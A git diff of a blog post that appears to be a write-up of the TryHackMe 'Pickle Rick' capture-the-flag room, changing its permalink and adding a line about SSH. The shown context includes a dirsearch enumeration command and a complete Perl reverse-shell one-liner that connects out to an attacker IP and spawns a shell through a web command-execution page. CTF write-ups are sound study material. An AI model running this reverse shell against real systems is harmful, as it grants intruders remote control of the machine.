--- a/_posts/ctf/tryhackme/pickle_rick/2022-05-09-fuzzer.md
+++ b/_posts/ctf/tryhackme/pickle_rick/2022-05-09-fuzzer.md
@@ -1,7 +1,7 @@
 ---
 layout: post
 title: 'TryHackMe | Pickle Rick'
-permalink: /notes/thm/pickle-rick/
+permalink: /thm/pickle-rick/
 ---
 
 # Enumeration
@@ -33,6 +33,8 @@ dirsearch -r -u http://10.10.253.214/ -w /usr/share/wordlists/dirbuster/director
 {% endhighlight %}
 
 # Explotation
+We can try to access with ssh but we need the RSA.
+
 We can get a **login.php** and access with the creds. We can see a command execution and try a reverse shell with perl:
 {% highlight mysql %}
 perl -e 'use Socket;$i="10.18.91.218";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
